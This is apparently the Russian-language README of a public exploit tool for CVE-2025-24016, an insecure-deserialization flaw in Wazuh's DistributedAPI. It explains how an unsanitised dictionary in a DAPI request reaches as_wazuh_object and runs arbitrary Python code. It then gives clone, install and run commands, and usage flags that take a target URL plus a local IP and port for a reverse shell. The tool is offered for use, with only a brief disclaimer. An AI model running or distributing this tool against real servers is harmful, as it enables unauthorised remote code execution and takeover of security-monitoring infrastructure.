
Автономный CLI-эксплойт для уязвимости небезопасной десериализации в Wazuh, позволяющий удаленное выполнение кода путем внедрения специально созданных словарей DAPI для получения обратной оболочки.
Уязвимость небезопасной десериализации на серверах Wazuh позволяет удаленное выполнение кода через внедрение неочищенного словаря в запросы/ответы DAPI. Эта проблема возникает из-за того, как параметры DistributedAPI сериализуются в JSON, а затем десериализуются с помощью функции as_wazuh_object в framework/wazuh/core/cluster/common.py.
Если злоумышленник внедряет неочищенный словарь в запрос или ответ DAPI, он может создать необработанное исключение (unhandled_exc), что позволяет выполнить произвольный код Python.

| ❗ Отказ от ответственности |
|---|
| Этот проект в первую очередь предназначен для использования в качестве автономного CLI-инструмента. Запуск этого эксплойта как сервиса может представлять угрозу безопасности. Рекомендуется использовать его с осторожностью и дополнительными мерами безопасности. DWYOR |
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
pip install -r requirements.txt
python3 CVE-2025-24016.py -h
Это отобразит справку по инструменту. Вот все переключатели, которые он поддерживает.
Usage:
python3 CVE-2025-24016.py [flags]
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (ex: https://<worker-server>:55000/security/user/authenticate/run_as)
-i IP, --ip IP Local host for reverse shell connection
-p PORT, --port PORT Local port for reverse shell connection